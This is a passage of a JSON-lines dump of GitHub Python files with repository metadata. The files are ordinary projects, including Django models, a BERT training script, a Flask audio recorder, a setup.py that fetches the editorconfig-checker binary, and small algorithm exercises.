3:\n # full house\n if len(c.keys()) == 2:\n return\n\ndef texasHoldem(common, a, b):\n pass\n","repo_name":"shubham25namdeo/Leetcode","sub_path":"unsolved/texas-poker-game.py","file_name":"texas-poker-game.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"29708924193","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.urls import reverse\n\n# Create your models here.\nDepart_Class = [\n ('اﻷول', 'اﻷول'),\n ('الثاني ', 'الثاني '),\n ('الثالث', 'الثالث'),\n ('الرابع', 'الرابع'),\n ('الخامس', 'الخامس'),\n ('السادس', 'السادس'),\n ('السابع', 'السابع'),\n ('الثامن', 'الثامن'),\n ('التاسع', 'التاسع'),\n ('العاشر', 'العاشر'),\n]\n\nSECTION = [('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'),\n ('6', '6'), ('7', '7')]\n\nSYSTEM = [('نظام سنوي', ' نظام سنوي'), ('نظام الفصول', 'نظام الفصول')]\n\nSTUDY_YEARS = [\n ('2 سنوات', '2 سنوات'),\n ('3 سنوات', '3 سنوات'),\n ('4 سنوات', '4 سنوات'),\n ('5 سنوات', '5 سنوات'),\n]\n\n\nclass College(models.Model):\n CLtitle = models.CharField(max_length=200, verbose_name=_('اسم الكلية'))\n CLdescrip = models.TextField(max_length=1000, verbose_name=_('وصف الكلية'))\n CLdepart = models.CharField(max_length=200,\n choices=SECTION,\n verbose_name=_(\"عدد الأقسام\"))\n\n def get_absolute_url(self):\n return reverse('college:college_detail', kwargs={'id': self.id})\n\n def __str__(self):\n return self.CLtitle\n\n\nclass Department(models.Model):\n Dcollege = models.ForeignKey('College',\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n verbose_name=_(\"الكلية\"))\n Dtitle = models.CharField(max_length=200, verbose_name=_(\"القسم\"))\n Dsystem = models.CharField(max_length=200,\n choices=SYSTEM,\n verbose_name=_(\"نظام الدراسة\"))\n\n def __str__(self):\n return self.Dtitle\n\n\nclass Book(models.Model):\n Btitle = models.CharField(max_length=200, verbose_name=_(\"عنوان الكتاب\"))\n pdf = models.FileField(upload_to='media/pdf', null=True, blank=True)\n Bcollge = models.ForeignKey('College',\n on_delete=models.CASCADE,\n verbose_name=_(\"الكلية\"))\n Bdepart = models.ForeignKey('Department',\n on_delete=models.CASCADE,\n verbose_name=_(\"القسم\"))\n Bclass = models.CharField(max_length=20,\n choices=Depart_Class,\n verbose_name=_(\"الفصل الدراسي\"))\n Bdescrip = models.TextField(max_length=200, verbose_name=_(\"Desciption\"))\n\n def __str__(self):\n return self.Btitle\n\n\nclass Branch(models.Model):\n BRtitle = models.CharField(max_length=200, verbose_name=_('الفرع'))\n BRImg = models.ImageField(upload_to='static/img/branchs',\n verbose_name=_('الصورة'))\n BRdescrip = models.TextField(max_length=1000, verbose_name=_('وصف الفرع'))\n\n def __str__(self):\n return self.BRtitle\n","repo_name":"Abubakar-hamad/django-books-uni","sub_path":"college/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71432116732","text":"import json\nimport logging\nfrom pathlib import Path\n\nfrom transformers.tokenization_bert import BertTokenizer\n\nfrom farm.data_handler.data_silo import StreamingDataSilo\nfrom farm.data_handler.processor import BertStyleLMProcessor\nfrom farm.modeling.adaptive_model import AdaptiveModel\nfrom farm.modeling.language_model import LanguageModel\nfrom farm.modeling.optimization import initialize_optimizer\nfrom farm.modeling.prediction_head import BertLMHead, NextSentenceHead\nfrom farm.train import Trainer\nfrom farm.utils import set_all_seeds, MLFlowLogger, initialize_device_settings\n\n\ndef train_from_scratch(args):\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n\n ml_logger = MLFlowLogger(tracking_uri=args.get(\"mlflow_tracking_uri\", \"file:/opt/ml/model/mlflow\"))\n ml_logger.init_experiment(experiment_name=\"train_from_scratch\", run_name=\"run\")\n\n set_all_seeds(seed=39)\n device, n_gpu = initialize_device_settings(use_cuda=True)\n evaluate_every = int(args[\"evaluate_every\"])\n\n save_dir = Path(\"/opt/ml/model\")\n data_dir = Path(\"/opt/ml/input/data/input_channel\")\n\n # 1.Create a tokenizer\n tokenizer = BertTokenizer(data_dir/args[\"vocab_file\"], do_lower_case=args[\"do_lower_case\"])\n\n # 2. Create a DataProcessor that handles all the conversion from raw text into a PyTorch Dataset\n processor = BertStyleLMProcessor(\n data_dir=data_dir,\n tokenizer=tokenizer, max_seq_len=int(args[\"max_seq_len\"]),\n train_filename=args[\"train_file\"],\n dev_filename=args.get(\"dev_file\", None),\n test_filename=args.get(\"test_file\", None),\n )\n\n # 3. Create a DataSilo that loads several datasets (train/dev/test), provides DataLoaders for them and\n # calculates a few descriptive statistics of our datasets\n stream_data_silo = StreamingDataSilo(processor=processor, batch_size=int(args[\"batch_size\"]))\n\n # 4. Create an AdaptiveModel\n # a) which consists of a pretrained language model as a basis\n language_model = LanguageModel.from_scratch(\"bert\", tokenizer.vocab_size)\n\n # b) and *two* prediction heads on top that are suited for our task => Language Model finetuning\n lm_prediction_head = BertLMHead(768, tokenizer.vocab_size)\n next_sentence_head = NextSentenceHead([768, 2], task_name=\"nextsentence\")\n\n model = AdaptiveModel(\n language_model=language_model,\n prediction_heads=[lm_prediction_head, next_sentence_head],\n embeds_dropout_prob=0.1,\n lm_output_types=[\"per_token\", \"per_sequence\"],\n device=device,\n )\n\n # 5. Create an optimizer\n model, optimizer, lr_schedule = initialize_optimizer(\n model=model,\n learning_rate=float(args[\"learning_rate\"]),\n schedule_opts={\"name\": \"LinearWarmup\", \"warmup_proportion\": float(args[\"warmup_proportion\"])},\n n_batches=len(stream_data_silo.get_data_loader(\"train\")),\n n_epochs=int(args[\"n_epochs\"]),\n device=device,\n grad_acc_steps=int(args[\"gradient_accumulation_steps\"]),\n )\n\n # 6. Feed everything to the Trainer, which keeps care of growing our model and evaluates it from time to time\n if args.get(\"checkpoint_every\"):\n checkpoint_every = int(args[\"checkpoint_every\"])\n checkpoint_root_dir = Path(\"/opt/ml/checkpoints/training\")\n else:\n checkpoint_every = None\n checkpoint_root_dir = None\n\n trainer = Trainer.create_or_load_checkpoint(\n model=model,\n optimizer=optimizer,\n data_silo=stream_data_silo,\n epochs=int(args[\"n_epochs\"]),\n n_gpu=n_gpu,\n lr_schedule=lr_schedule,\n evaluate_every=evaluate_every,\n device=device,\n grad_acc_steps=int(args[\"gradient_accumulation_steps\"]),\n checkpoint_every=checkpoint_every,\n checkpoint_root_dir=checkpoint_root_dir,\n )\n # 7. Let it grow! Watch the tracked metrics live on the public mlflow server: https://public-mlflow.deepset.ai\n trainer.train()\n\n # 8. Hooray! You have a model. Store it:\n model.save(save_dir)\n processor.save(save_dir)\n\n\nif __name__ == \"__main__\":\n with open(\"/opt/ml/input/config/hyperparameters.json\") as f:\n params = json.load(f)\n logging.info(f\"Starting a train job with parameters {params}\")\n train_from_scratch(params)\n","repo_name":"julian-risch/PatentMatch-FARM","sub_path":"examples/train_from_scratch_with_sagemaker.py","file_name":"train_from_scratch_with_sagemaker.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"3714093115","text":"from abc import ABC\nfrom typing import Any, Optional\nfrom pip_services4_components.context import IContext\n\nfrom .RestClient import RestClient\n\n\nclass CommandableHttpClient(RestClient, ABC):\n \"\"\"\n Abstract client that calls commandable HTTP service.\n Commandable controller are generated automatically for ICommandable objects. Each command is exposed as POST operation that receives all parameters in body object.\n\n ### Configuration parameters ###\n - base_route: base route for remote URI\n - connection(s):\n - discovery_key: (optional) a key to retrieve the connection from IDiscovery\n - protocol: connection protocol: http or https\n - host: host name or IP address\n - port: port number\n - uri: resource URI or connection string with all parameters in it\n - options:\n - retries: number of retries (default: 3)\n - connect_timeout: connection timeout in milliseconds (default: 10 sec)\n - timeout: invocation timeout in milliseconds (default: 10 sec)\n\n ### References ###\n - `*:logger:*:*:1.0` (optional) :class:`ILogger ` components to pass log messages\n - `*:counters:*:*:1.0` (optional) :class:`ICounters ` components to pass collected measurements\n - `*:discovery:*:*:1.0` (optional) :class:`IDiscovery ` controller to resolve connection\n\n Example:\n \n .. code-block:: python\n\n class MyCommandableHttpClient(CommandableHttpClient, IMyClient):\n # ...\n\n def get_data(self, context, id):\n return self.call_command(\"get_data\", context, MyData(id))\n\n # ...\n\n client = MyCommandableHttpClient()\n client.configure(ConfigParams.from_tuples(\"connection.protocol\", \"http\",\n \"connection.host\", \"localhost\",\n \"connection.port\", 8080))\n data = client.getData(\"123\", \"1\")\n # ...\n \"\"\"\n\n def __init__(self, base_route: str):\n \"\"\"\n Creates a new instance of the client.\n\n :param base_route: a base route for remote service.\n \"\"\"\n super(CommandableHttpClient, self).__init__()\n self._base_route = base_route\n\n def call_command(self, name: str, context: Optional[IContext], params: Any) -> Any:\n \"\"\"\n Calls a remote method via HTTP commadable protocol. The call is made via POST operation and all parameters are sent in body object. The complete route to remote method is defined as baseRoute + \"/\" + name.\n\n :param name: a name of the command to call.\n\n :param context: (optional) transaction id to trace execution through call chain.\n\n :param params: command parameters.\n\n :return: result of the command.\n \"\"\"\n timing = self._instrument(context, self._base_route + '.' + name)\n try:\n # route = self.__fix_route(self._base_route) + self.__fix_route(name)\n # if self._base_route and self._base_route[0] != '/':\n # route = '/' + self._base_route + '/' + name\n # else:\n # route = self._base_route + '/' + name\n return self._call('POST', name, context, None, params)\n except Exception as err:\n timing.end_failure(err)\n raise err\n finally:\n timing.end_timing()\n","repo_name":"pip-services4/pip-services4-python","sub_path":"pip-services4-http-python/pip_services4_http/clients/CommandableHttpClient.py","file_name":"CommandableHttpClient.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14360263081","text":"from flask import Flask, render_template\r\nimport wave\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.io.wavfile as wav\r\nimport sounddevice as sd\r\nimport os\r\nfrom os.path import exists\r\n\r\napp = Flask(__name__)\r\n\r\nduration = 10 # recording duration in seconds\r\nfs = 44100 # sampling frequency\r\nchannels = 1 # number of channels\r\n\r\ndef record_audio(filename):\r\n print(\"Recording started\")\r\n myrecording = sd.rec(int(duration * fs), samplerate=fs,\r\n channels=channels, dtype='int16')\r\n sd.wait() # Wait until recording is finished\r\n print(\"Recording stopped\")\r\n wav.write(os.path.join(\"static\", filename), fs, \r\n myrecording) # Save the recording to a file\r\n\r\ndef waveform():\r\n obj = wave.open('static/recorded_audio.wav', 'rb')\r\n sample_freq = obj.getframerate()\r\n n_samples = obj.getnframes()\r\n signal_wave = obj.readframes(-1)\r\n duration = n_samples/sample_freq\r\n signal_array = np.frombuffer(signal_wave, dtype=np.int16)\r\n time = np.linspace(0, duration, num=n_samples)\r\n\r\n plt.figure(figsize=(15, 5))\r\n plt.plot(time, signal_array)\r\n plt.title('Audio Plot')\r\n plt.ylabel('signal wave')\r\n plt.xlabel('time (s)')\r\n plt.xlim(0, duration)\r\n plt.savefig('static/waveform.png') # Save the waveform \r\n # plot to a file\r\n plt.close()\r\n\r\ndef spectrogram():\r\n obj = wave.open('static/recorded_audio.wav', 'rb')\r\n sample_freq = obj.getframerate()\r\n n_samples = obj.getnframes()\r\n signal_wave = obj.readframes(-1)\r\n duration = n_samples/sample_freq\r\n signal_array = np.frombuffer(signal_wave, dtype=np.int16)\r\n\r\n # Compute the spectrogram\r\n window = signal.get_window('hamming', 1024)\r\n f, t, Sxx = signal.spectrogram(signal_array, sample_freq, \r\n window=window, nperseg=1024, noverlap=512, mode='magnitude')\r\n\r\n # Plot the spectrogram\r\n plt.figure(figsize=(15, 5))\r\n plt.pcolormesh(t, f, 20 * np.log10(Sxx), cmap='inferno')\r\n plt.ylim(0, 22050) # Limit the y axis to frequencies below\r\n # 22050 Hz\r\n plt.xlabel('Time (s)')\r\n plt.ylabel('Frequency (Hz)')\r\n plt.title('Spectrogram')\r\n plt.colorbar()\r\n plt.savefig('static/spectrogram.png') # Save the \r\n # spectrogram plot to a file\r\n plt.close()\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/record')\r\ndef record():\r\n path1 = \"/home/pi/Desktop/server/static/recorded_audio.wav\"\r\n path2 = \"/home/pi/Desktop/server/static/spectrogram.png\"\r\n path3 = \"/home/pi/Desktop/server/static/waveform.png\"\r\n\r\n if (os.path.exists(path1) or os.path.exists(path2) or \r\n os.path.exists(path3)):\r\n os.remove(path1)\r\n os.remove(path2)\r\n os.remove(path3)\r\n else:\r\n pass\r\n\r\n record_audio('recorded_audio.wav')\r\n waveform()\r\n spectrogram()\r\n return render_template('recording.html')\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0', port=5000)\r\n","repo_name":"serrvictor/STUDY-AND-DESIGN-OF-AN-INTERFACE-FOR-REMOTE-AUDIO-PROCESSING","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922658491","text":"def find_minimum(a,k):\n min = a[0]\n max = a[0]\n\n for j in range (1,len(a)):\n if min > a[j]:\n min = a[j]\n if max < a[j]:\n max = a[j]\n if k <=1:\n return min\n if k >= len(a):\n return max\n for i in range (2,k+1):\n ith_min = max\n for j in range(len(a)):\n if a[j] < ith_min and a[j] > min:\n ith_min = a[j]\n min =ith_min\n print(i)\n print(ith_min)\n print(\"---\")\n return ith_min\n\na=[3,5,1,10,7,22,15,19,6,8,16]\nk =6\n\nprint(find_minimum(a,k))","repo_name":"JowettC/IS1702-CT","sub_path":"week 2/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13718512398","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis setup logic is highly inspired to the one used in `https://github.com/shellcheck-py/shellcheck-py`.\n\nAfter `https://github.com/editorconfig-checker/editorconfig-checker.python/issues/15` was opened,\nwe decided to move the wrapper logic directly in the setup phase.\n\nDuring setup, the tarball that contains the executable will be downloaded based on\nthe target machine and its content extracted in the proper output directory.\n\nOnce the setup is complete, the `ec` executable should be available on your machine.\n\"\"\"\n\nfrom distutils.command.build import build as orig_build\nfrom distutils.core import Command\nfrom io import BytesIO\nfrom os import chmod, makedirs, path, stat\nfrom platform import architecture, machine, system\nfrom stat import S_IXGRP, S_IXOTH, S_IXUSR\nfrom tarfile import open as tarfile_open\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as orig_install\n\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept ImportError:\n # Python 2.7\n from urllib2 import urlopen\n\n\nWRAPPER_VERSION = '2.7.3'\nEDITORCONFIG_CHECKER_CORE_VERSION = '2.7.2'\nEDITORCONFIG_CHECKER_EXE_NAME = 'ec'\n\n\ndef get_tarball_url():\n def get_ec_name_by_system():\n # Platform architecture() system() machine()\n # ---------------------------------------------------------------\n # Linux x86 64bit ('64bit', 'ELF') 'Linux' 'x86_64'\n # Linux AWS Graviton2 ('64bit', 'ELF') 'Linux' 'aarch64'\n # Mac x86 64bit ('64bit', '') 'Darwin' 'x86_64'\n # Mac M1 64bit ('64bit', '') 'Darwin' 'arm64'\n _system = system()\n _machine = machine()\n if _machine == 'x86_64':\n _architecture = 'amd64'\n elif _machine == 'aarch64' or _machine == 'arm64':\n _architecture = 'arm64'\n elif isinstance(architecture(), tuple) and len(architecture()) > 0:\n _architecture = 'amd64' if architecture()[0] == '64bit' else '386'\n else:\n raise ValueError('Cannot determine architecture')\n\n # The core, from `2.7.0`, introduces the extension in the tarball name\n # (e.g. `ec-windows-386.exe.tar.gz`, `ec-windows-arm.exe.tar.gz`)\n _ext = '.exe' if _system == 'Windows' else ''\n\n return 'ec-{}-{}{}'.format(\n _system.lower(),\n _architecture,\n _ext,\n )\n\n return 'https://github.com/editorconfig-checker/editorconfig-checker/releases/download/{}/{}.tar.gz'.format(\n EDITORCONFIG_CHECKER_CORE_VERSION,\n get_ec_name_by_system(),\n )\n\n\ndef download_tarball(url):\n sock = urlopen(url)\n code = sock.getcode()\n\n if code != 200:\n sock.close()\n raise ValueError('HTTP failure. Code: {}'.format(code))\n\n data = sock.read()\n sock.close()\n\n return data\n\n\ndef extract_tarball(url, data):\n with BytesIO(data) as bio:\n if '.tar.' in url:\n with tarfile_open(fileobj=bio) as fp:\n for info in fp.getmembers():\n if info.isfile() and info.name.startswith('bin/ec-'):\n return fp.extractfile(info).read()\n\n raise AssertionError('unreachable `extract` function')\n\n\ndef save_executables(data, base_dir):\n exe = EDITORCONFIG_CHECKER_EXE_NAME\n if system() == 'Windows':\n exe += '.exe'\n\n output_path = path.join(base_dir, exe)\n try:\n # Python 3\n makedirs(base_dir, exist_ok=True)\n except TypeError:\n # Python 2.7\n makedirs(base_dir)\n\n with open(output_path, 'wb') as fp:\n fp.write(data)\n\n # Mark as executable ~ https://stackoverflow.com/a/14105527\n mode = stat(output_path).st_mode\n mode |= S_IXUSR | S_IXGRP | S_IXOTH\n chmod(output_path, mode)\n\n\nclass build(orig_build):\n sub_commands = orig_build.sub_commands + [('fetch_binaries', None)]\n\n\nclass install(orig_install):\n sub_commands = orig_install.sub_commands + [('install_editorconfig_checker', None)]\n\n\nclass fetch_binaries(Command):\n build_temp = None\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n self.set_undefined_options('build', ('build_temp', 'build_temp'))\n\n def run(self):\n # save binary to self.build_temp\n url = get_tarball_url()\n archive = download_tarball(url)\n data = extract_tarball(url, archive)\n save_executables(data, self.build_temp)\n\n\nclass install_editorconfig_checker(Command):\n description = 'install the editorconfig-checker executable'\n outfiles = ()\n build_dir = install_dir = None\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n # this initializes attributes based on other commands' attributes\n self.set_undefined_options('build', ('build_temp', 'build_dir'))\n self.set_undefined_options('install', ('install_scripts', 'install_dir'))\n\n def run(self):\n self.outfiles = self.copy_tree(self.build_dir, self.install_dir)\n\n def get_outputs(self):\n return self.outfiles\n\n\ncommand_overrides = {\n 'install': install,\n 'install_editorconfig_checker': install_editorconfig_checker,\n 'build': build,\n 'fetch_binaries': fetch_binaries,\n}\n\n\ntry:\n from wheel.bdist_wheel import bdist_wheel as orig_bdist_wheel\nexcept ImportError:\n pass\nelse:\n class bdist_wheel(orig_bdist_wheel):\n def finalize_options(self):\n orig_bdist_wheel.finalize_options(self)\n # Mark us as not a pure python package\n self.root_is_pure = False\n\n def get_tag(self):\n _, _, plat = orig_bdist_wheel.get_tag(self)\n # We don't contain any python source, nor any python extensions\n return 'py2.py3', 'none', plat\n\n command_overrides['bdist_wheel'] = bdist_wheel\n\n\nsetup(version=WRAPPER_VERSION, cmdclass=command_overrides)\n","repo_name":"editorconfig-checker/editorconfig-checker.python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"78"} +{"seq_id":"13093601322","text":"#\n# @lc app=leetcode id=278 lang=python3\n#\n# [278] First Bad Version\n#\n\n# @lc code=start\n# The isBadVersion API is already defined for you.\n# @param version, an integer\n# @return an integer\n# def isBadVersion(version):\n\nclass Solution:\n def firstBadVersion(self, n):\n \"\"\"\n returns the first bad version of a release\n Runtime:O(n log(n)))\n Space:O(1)\n :type n: int\n :rtype: int\n \"\"\"\n\n lo,hi = 0, n\n while lo <= hi:\n mid = lo + (hi - lo)//2\n if(isBadVersion(mid)):\n hi = mid -1\n else:\n lo = mid+1\n return lo\n \n# @lc code=end\n\n","repo_name":"SegFault2017/LeetCode2021-2022","sub_path":"python/278.first-bad-version.py","file_name":"278.first-bad-version.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2450392918","text":"#Our convention is that the next tail link is the head, and the previous head link is the tail\n#Another condition that pop is the transfer of the head to the end of the queue (to the tail)\n\n####################This is a circular queue########################\n\nclass Queue:\n\n head = None #creating a head and tail for convenience\n tail = None\n\n class Node:\n value = None\n next = None # Initialize the value, the reference to the next element and the previous one\n prev = None\n def __init__(self,value, next = None, prev = None):\n self.value = value\n self.next = next\n self.prev = None\n\n def push(self, value): \n if self.head is None: #If the queue is empty, then add the first element - the head and tail of the queue\n self.head = self.tail = self.Node(value)\n return\n self.tail.next = self.Node(value)\n self.tail.next.prev = self.tail #If we already have items in the queue, then we shift the tail and add\n self.tail = self.tail.next\n\n def pop(self):\n if self.head is None: #if there are no items in the queue, then we output an error\n print(\"Queue is empty!\")\n return\n if self.head.next is None: # If there is one item in the queue, then we do nothing\n return\n current = self.head\n self.head = self.head.next #This is my implementation of the transfer\n self.tail.next = current\n current.prev = self.tail\n self.tail = current\n self.tail.next = None\n \n def get(self,index):\n self.head.prev = self.tail # This is our main condition\n self.tail.next = self.head # This is our main condition\n\n if index == 0:\n print(self.head.value) # if the index is 0 then we return the head\n return\n if index > 0:\n counter = 0\n current = self.head # If the index is positive, then we start from the head and go counterclockwise\n while counter < index:\n current = current.next \n counter += 1\n print(current.value)\n return\n if index < 0:\n counter = 0\n current = self.tail\n while counter > index: # If the index is negative , then we start from the tail and go clockwise\n current = current.prev\n index += 1\n print(current.value)\n return\n def out(self):\n if self.head is None:\n print(\"Queue is empty\")\n return\n current = self.head\n while current.next != self.head: # We output the values until we meet the head again\n print(current.value, end = \" \")\n current = current.next\n print(current.value)\n\n# This is Simple CircularQueue (TEST) \n \nlist = Queue()\nlist.push(12)\nlist.push(-334)\nlist.push(313)\nlist.pop()\nlist.get(12)\nlist.get(0)\nlist.out()\n","repo_name":"ToiletHead/SimpleAlgorithms","sub_path":"Structures/CircularQueue.py","file_name":"CircularQueue.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42004933151","text":"rows, cols = [int(x) for x in input().split()]\n\nmatrix = []\n\nfor row in range(rows):\n matrix.append([])\n for col in range(cols):\n first_letter = chr(row + 97)\n middle_letter = chr(row + col+ 97)\n matrix[-1].append(f\"{first_letter}{middle_letter}{first_letter}\")\nprint(\"\\n\".join(\" \".join([str(el) for el in row]) for row in matrix))\n","repo_name":"milenpenev/Python_Advanced","sub_path":"Comprehensions/06. Matrix of Palindromes.py","file_name":"06. Matrix of Palindromes.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27259945498","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nimport pytest\nfrom numpy.testing import assert_array_almost_equal\n\nimport pysteps\n\npytest.importorskip(\"pygrib\")\n\n\ndef test_io_import_mrms_grib():\n \"\"\"Test the importer for NSSL data.\"\"\"\n\n root_path = pysteps.rcparams.data_sources[\"mrms\"][\"root_path\"]\n\n filename = os.path.join(\n root_path, \"2019/06/10/\", \"PrecipRate_00.00_20190610-000000.grib2\"\n )\n\n precip_full, _, metadata = pysteps.io.import_mrms_grib(\n filename, fillna=0, window_size=1\n )\n assert precip_full.shape == (3500, 7000)\n assert precip_full.dtype == \"single\"\n\n expected_metadata = dict(\n xpixelsize=0.01,\n ypixelsize=0.01,\n unit=\"mm/h\",\n transform=None,\n zerovalue=0,\n yorigin=\"upper\",\n )\n for key in expected_metadata.keys():\n assert metadata[key] == expected_metadata[key]\n\n # The full latitude range is (20.005, 54.995)\n # The full longitude range is (230.005, 299.995)\n\n # Test that if the bounding box is larger than the domain, all the points are returned.\n precip_full2 = pysteps.io.import_mrms_grib(\n filename, fillna=0, extent=(220, 300, 20, 55), window_size=1\n )[0]\n assert precip_full2.shape == (3500, 7000)\n\n assert_array_almost_equal(precip_full, precip_full2)\n\n del precip_full2\n\n # Test that a portion of the domain is returned correctly\n precip_clipped = pysteps.io.import_mrms_grib(\n filename, fillna=0, extent=(250, 260, 30, 35), window_size=1\n )[0]\n\n assert precip_clipped.shape == (500, 1000)\n assert_array_almost_equal(precip_clipped, precip_full[2000:2500, 2000:3000])\n del precip_clipped\n\n precip_single = pysteps.io.import_mrms_grib(filename, dtype=\"double\", fillna=0)[0]\n assert precip_single.dtype == \"double\"\n del precip_single\n\n precip_single = pysteps.io.import_mrms_grib(filename, dtype=\"single\", fillna=0)[0]\n assert precip_single.dtype == \"single\"\n del precip_single\n\n precip_donwscaled = pysteps.io.import_mrms_grib(\n filename, dtype=\"single\", fillna=0, window_size=2\n )[0]\n assert precip_donwscaled.shape == (3500 / 2, 7000 / 2)\n\n precip_donwscaled, _, metadata = pysteps.io.import_mrms_grib(\n filename, dtype=\"single\", fillna=0, window_size=3\n )\n expected_metadata = dict(\n xpixelsize=0.03,\n ypixelsize=0.03,\n unit=\"mm/h\",\n transform=None,\n zerovalue=0,\n yorigin=\"upper\",\n )\n for key in expected_metadata.keys():\n assert metadata[key] == expected_metadata[key]\n assert precip_donwscaled.shape == (3500 // 3, 7000 // 3)\n","repo_name":"chrimerss/EnsembleNowcast","sub_path":"pysteps-1.3.2/pysteps/tests/test_io_mrms_grib.py","file_name":"test_io_mrms_grib.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9901423988","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport cms.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('applications', '0006_service_name'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='service',\n name='name',\n field=cms.models.fields.PlaceholderField(editable=False, slotname='icon', related_name='service_name', null=True, to='cms.Placeholder'),\n preserve_default=True,\n ),\n ]\n","repo_name":"jonthdiaz/digital-works","sub_path":"applications/migrations/0007_auto_20150412_2150.py","file_name":"0007_auto_20150412_2150.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40287674744","text":"import discord \r\nfrom discord.ext import commands\r\nfrom discord.ext.commands.cooldowns import BucketType\r\n\r\nclass Meta(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n self.help_message = discord.Embed(\r\n description=\"**Reaction Poll**\\nCreate a reaction poll with multiple options by typing `+poll {title} [Option1] [Option2] [Option3]`.\",\r\n colour=0x83BAE3,\r\n )\r\n\r\n @commands.command(name=\"help\")\r\n @commands.cooldown(2,60,BucketType.user) \r\n async def help(self, ctx):\r\n await ctx.message.channel.send(embed=self.help_message)\r\n\r\ndef setup(bot):\r\n bot.add_cog(Meta(bot))\r\n","repo_name":"Shrey2809/Discord-Prediction-Bot","sub_path":"cogs/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40367890610","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 13 11:55:58 2018\n\n@author: Diego\n\"\"\"\n\nimport csv\nimport numpy as np\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom utils.dataclass import Quality, RD, Sex, Laterality\n\n# Load Data\npath = 'C:/Users/Diego/Dropbox/INESC/SCREEN-DR/Data/Tables/'\ncsv_file = 'BigTable.csv';\n# Read CSV\nbigtable = []\nwith open(path + csv_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=';')\n for row in readCSV:\n bigtable.append(row)\n\nheader = bigtable[0]\neye_data = bigtable[1:]\n# Prepare data \nparams = []\ngrading = []\nfor data in eye_data:\n \n rid = data[0] # id\n \n if Quality.BAD != Quality[data[18]]:\n # Age\n acq_date = data[3] # acquisition_datetime\n acq_date = datetime.date(int(acq_date[:4]), int(acq_date[5:7]), int(acq_date[8:10]))\n birth = data[13] # patient_birthdate\n birth = datetime.date(int(birth[:4]), int(birth[5:7]), int(birth[8:10]))\n age = relativedelta(acq_date, birth).years\n \n lat = Laterality[data[5]].value # laterality\n sex = Sex[data[12]].value # patient_sex\n \n # Append parameters \n params.append([rid, age, lat, sex])\n \n # Grading\n str_rd = data[21]\n str_rd = str_rd[:2]\n rd_grad = RD[str_rd].value # retinopathy\n grading.append(rd_grad)\n \nparams = np.array(params)\nparams.astype(int) \n\n\n'''\nPlot Data\n'''\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\ncolors = ['w', 'b', 'g', 'r', 'y']\nfor k in range(len(grading)):\n \n color = colors[grading[k]]\n ax.scatter(params[k,1].astype(int),\n params[k,2].astype(int),\n params[k,3].astype(int),\n c=color, marker='o')\n\nax.set_xlabel('Age')\nax.set_ylabel('Laterality')\nax.set_zlabel('Sex')\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dswanderley/data_clustering","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 